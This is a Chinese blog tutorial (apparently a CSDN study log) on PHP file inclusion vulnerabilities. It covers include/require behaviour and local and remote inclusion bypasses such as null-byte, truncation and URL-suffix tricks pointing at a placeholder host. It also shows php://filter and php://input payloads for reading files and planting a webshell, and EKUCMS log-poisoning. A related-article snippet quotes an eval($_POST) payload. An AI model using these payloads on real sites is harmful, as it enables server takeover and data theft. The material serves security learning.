第十三天 文件包含漏洞

最新推荐文章于 2023-02-06 20:37:02 发布
最新推荐文章于 2023-02-06 20:37:02 发布
阅读量220 收藏 1
点赞数
分类专栏: Web 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_46653764/article/details/106853911
版权

一、先了解include、require、include_once、require_once

include (或 require)语句会获取指定文件中存在的所有文本/代码/标记,并复制到使用 include 语句的文件中

include 和 require 语句是相同的除了错误处理方面:

(1)require 会生成致命错误(E_COMPILE_ERROR)并停止脚本
(2)include 只生成警告(E_WARNING),并且脚本会继续

语法: include 'filename’

比如现在有一个footer.php的文件↓
在这里插入图片描述
现在在另一个页面想把引用这个文件,则↓

<?php include 'footer.php'?> 就可以了

二、本地文件包含

做文件包含的演示时,都要在php.ini开启allow_url_include

首先在WWW目录下创建一个inc文件夹
在这里插入图片描述
然后再inc文件夹中创建一个include.php文件和index.txt文件
在这里插入图片描述
其中,include.php中写入代码↓(意思是通过get请求参数f的值,参数f的值是要引入的文件,例如?f=index.txt,就是把index.txt的内容引入到include.php这个页面,include.php就会显示phpinfo()的信息
在这里插入图片描述
index.txt写入↓(index.txt是被引入的文件内容
在这里插入图片描述

最终操作就是↓
在这里插入图片描述

三、本地文件包含(有限制时,限制只能包含html文件)

这时如何突破呢?↓

include.php?filename=index.txt%00

include.php?filename=index.txt/./. (windows加上256+,Linux加上4096+)

四、远程文件包含

在这里插入图片描述

五、远程文件包含(有限制只能包含html文件时)

那该如何突破呢?↓

include.php?filename=http://xxx.com/1.txt?

include.php?filename=http://xxx.com/1.txt%23(%23是#)

include.php?filename=http://xxx.com/1.txt%20(%20是空格)

六、伪协议

file://

ftp://

php://
等等…

而文件包含会用到的伪协议是:↓

file://(任意文件读取)
include.php?filename=file://C:\1.txt

php://filter(任意文件读取)
include.php?filename=php://filter/convert.base64-encode/resource=index.txt ↓
在这里插入图片描述

php://input(任意代码执行)
include.php?filename=php://input
POST DATA:<?php phpinfo(); ?>
常用于写入一句话后门
在这里插入图片描述
在这里插入图片描述
先新建了shell.php的文件,并在文件中写入了一句话木马,这样就可以拿shell了↑

在这里插入图片描述

在这里插入图片描述

在这里插入图片描述

在这里插入图片描述

在这里插入图片描述

在这里插入图片描述

易酷cms文件包含漏洞的挖掘(通过日志文件)

在这里插入图片描述
my/show/id/ 这是cms的一个模板(可以这样理解吧),不同的cms是不一样的,自己搜一下即可

然后↓
在这里插入图片描述
错误的信息就会写入到日志文件中↓
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

Sanfer23
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
文件包含漏洞(原理、挖掘与利用、DVWA 文件包含部分)
m0_61506558的博客
08-06 648
在bilibili里面底部的代码是不变的。包含内容包含页头、页脚包含函数 公共函数减少重复代码、便于维护1.2 问题可能会导致允许访问敏感文件或者执行恶意代 码,造成漏洞1.3 分类1.3.1 本地文件包含漏洞LFI目录遍历漏洞任意文件访问漏洞固定包含通过接口动态包含包含恶意代码或图片马包含敏感文件1.3.2 远程文件包含漏洞漏洞描述原因后果XXEXML外部实体注入使用XML参数数据,并且可以解析外部实体导致访问敏感文件、探测端口、执行系统命名SSRF。......
文件包含漏洞挖掘(一)
记录并分享学习安全的知识点..
02-07 1970
一、概述 文件包含漏洞是指通过构造一个恶意URL来读取非WEB目录中的文件。正常情况下用户通过浏览器访问的范围被限制在被限制在WEB目录里,系统中的其他目录是无法访问的。 以PHP为例,服务器在执行一个PHP文件的时候,可以加载并执行其他文件的php代码,这个功能是通过以下四个函数其中之一来实现的: (1)incllude() (2)require() (3)include_once() (4)requre() 其中以include为例,作用是将文件包含进来,如果发生错误就会警告,并继
DVWA系列之16 文件包含漏洞挖掘与防御
weixin_33921089的博客
12-23 252
下面我们来分析一下DVWA中文件包含漏洞的源码。首先文件包含的主页面是D:\AppServ\www\dvwa\vulnerabilities\fi\index.php文件,文件中的主要代码部分:在这段代码中,首先使用switch语句根据用户选择的安全级别,分别将low.php、medium.php、high.php赋值给变量$vulnerabilityFile,接下来使用require_once函...
米斯特白帽培训讲义(v2)漏洞文件包含
热门推荐
龙哥盟
03-01 3万+
米斯特白帽培训讲义 漏洞文件包含 讲师:gh0stkey 整理:飞龙 协议:CC BY-NC-SA 4.0 原理文件包含就是将一个文件包含到自己的文件中执行。它可分为本地包含和远程包含,本地包含即包含本地磁盘上的文件,文件名称是相对路径或绝对路径,远程包含即包含互联网上的文件,文件名称是 URL。本地包含比如我们有一个test.txt文件,仅仅调用phpinfo来测试:<
文件包含-伪协议
孤的博客
10-02 8804
文件包含漏洞利用的前提 1.web 应用采用 include 等文件包含函数,并且需要包含的文件路径是通过用户传输参数的方式引入; 2.用户能够控制包含文件的参数,被包含的文件可被当前页面访问; 在使用文件包含漏洞时,必须要能知道其绝对路径 方法: 在包含文件处,查看其返回的错误的信息 伪协议文件包含 file:// 访问本地文件系统 http:// 访问 HTTPs 网址 ftp:// ...
第十三节 文件上传-竞争条件-01
最新发布
09-15
例如,某些网站允许用户上传任意文件,但是如果上传的文件包含恶意代码,网站会删除该文件。但是,如果攻击者在网站删除文件之前访问上传的文件,可以执行上传文件中的恶意代码。 例如,攻击者可以上传一个 PHP ...
第十二节 文件上传-图片Webshell上传-01
09-15
第三步:文件包含漏洞代码分析 在PHP中,使用include、require、include_once、require_once函数包含的文件都会被当作PHP代码执行,无论文件的名称是什么,只要符合文件内容符合PHP代码规范,都会被当作PHP代码执行...
iOS13.7的镜像文件
09-10
3. **深色模式**:iOS 13引入的深色模式不仅降低了屏幕亮度,减轻了眼睛疲劳,还在许多系统应用和第三方应用中提供了良好的夜间阅读体验。 4. **智能电池充电**:这一功能通过学习用户的充电习惯,减缓了电池老化...
ThinkPHP3.2.x RCE漏洞通报1
08-03
当攻击者能够控制`assign`方法的第一个参数时,他们可以覆盖模板文件路径变量,从而实现任意文件包含,最终执行恶意代码。 漏洞的原理在于,ThinkPHP在处理模板文件时,如果业务代码中使用了`assign`方法,并且第一...
第13周做题记录1
08-08
在第13周的做题记录中,我们关注的是两个网络安全相关的挑战,它们涉及到Flask框架的应用以及SQL注入漏洞的利用。首先,我们来看第一个挑战——hacker101的bugdb v1和v3版本。 在bugdb v1中,挑战似乎相对简单,...
易酷CMS v2.5
05-14
易酷免费影视系统V2.5 Final对比以往版本做了如下操作: 1、多分类批量处理 2、分页模板独立 3、后台视频管理可按播放器或者星级选择视频 4、采用友言社会化评论系统 5、后台生成显示当前状态 6、幻灯片支持分类调用 7、添加自定义采集资讯 8、common.php 加载 con_common.php 文件 9、模板自定义主目录(再不不担心模板被盗用了) 10、影片总数、今天更新数量、昨天更新、本周更新、本月更新 11、更多标签的支持完善 01、地区 02、年代 03、星级 04、字母 12、后台数据库密码"*"表示 13、详情页去除多余的关键字描述14
文件包含漏洞&伪协议
qq_62078839的博客
04-16 2290
文件包含 文件包含漏洞原理 PHP文件包含漏洞的产生原因是在通过PHP的函数引入文件时,由于传入的文件名没有经过合理的校验,从而操作了预想之外的文件,就可能导致意外的文件泄露甚至恶意的代码注入 include:包含并运行指定的文件,包含文件发生错误时,程序警告,但会继续执行。 include_once:检查这个文件是否已经被导入,如果已导入,便不会再导入。 require:包含并运行指定的文件,包含文件发生错误时,程序直接终止执行。 require_once:和 require 类似,不同处在于
【每天学习一点新知识】文件包含常用之伪协议
RexHa的博客
02-06 3639
一些比较常用的php伪协议用法及部分演示过程
易酷CMS2.5本地文件包含漏洞分析
weixin_39915160的博客
01-14 3891
文件包含漏洞是指开发人员都希望代码更加灵活,所以通常会将被包含的文件设置为变量,用来进行动态调用。正是这种灵活性,从而导致客户端可以调用一个恶意文件,造成文件包含漏洞。易酷 cms2.5 本地文件包含漏洞可getshell。 下载源码安装(http://127.0.0.1/test/ekucms2.5/install.php) 安装成功后进行复现,本地包含写一句话木马。 http://127.0.0.1/test/ekucms2.5/?s=my/show/id/{~eval...
ekucms2.5本地文件包含漏洞-代码审计
weixin_44076904的博客
02-17 4513
ekucms2.5本地文件包含漏洞-代码审计 一、前言 ​ 为了学习Thinkphp框架的运行原理以及加强自身代码审计能力,所以特意在网上寻找了一个由php编写的CMS漏洞文章,对其进行复现和逆向代码审计。漏洞参考文章如下: 易酷 cms2.5 本地文件包含漏洞 getshell - Oran9e - 博客园 (cnblogs.com) 调试工具: phpstudy2018+phpstorm+xdebug; Firefox; xdebug helper 工具使用说明: ​ (1) phps
Web渗透测试之SRC挖掘经验分享
03-30
专注培养高薪网络安全人才,帮助大家了解并学习网络安全,传授黑白帽实战技能,带领零基础小白正式踏入入门阶段。把所有漏洞作为总结讲解,从理论到实战的分享,所有经验。结合漏洞挖掘的经验以及安全工作相关的经验总结漏洞原理、发现、利用,修复,姿势,防御,等多方面思路。实战方面结合以往挖掘SRC经验,把如何操作的各种方法和经验,以及挖过的漏洞,全部分享。具备web渗透测试工程师的工作水平; 能够挖掘各家SRC应急响应中心漏洞,凭借挖漏洞月收入过万
文件操作之文件包含漏洞
weixin_52657559的博客
12-08 1208
文件包含原理,远程包含,本地包含,实例
易酷cms本地包含漏洞拿shell
andiao1218的博客
12-02 798
测试版本:易酷cms2.5 包含一句话:http://localhost/ekucms2.5/?s=my/show/id/{~eval($_POST[x])} 会在网站的/temp/Logs/目录下生成一个错误日志,命名规则为年_月_日 错误日志内容 包含错误日志,地址:http://localhost/ekucms2.5/?s=my/show/id/\..\temp...
易酷CMS2.5本地文件包含漏洞复现
谢公子的博客
11-28 3307
易酷CMS是一款影片播放CMS。该CMS2.5版本存在本地文件包含漏洞。我们可以利用这个漏洞,让其包含日志文件,然后再利用报错信息将一句话木马写入日志中。然后利用文件包含漏洞包含该日志文件,再用菜刀连接拿shell。 渗透之前的操作,比如先用后台扫描工具,扫描得到该网站的后台目录结构,才更好的进行后面的操作。 我们通过访问该url,将一句话木马写入日志文件中 http://192.168.1...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值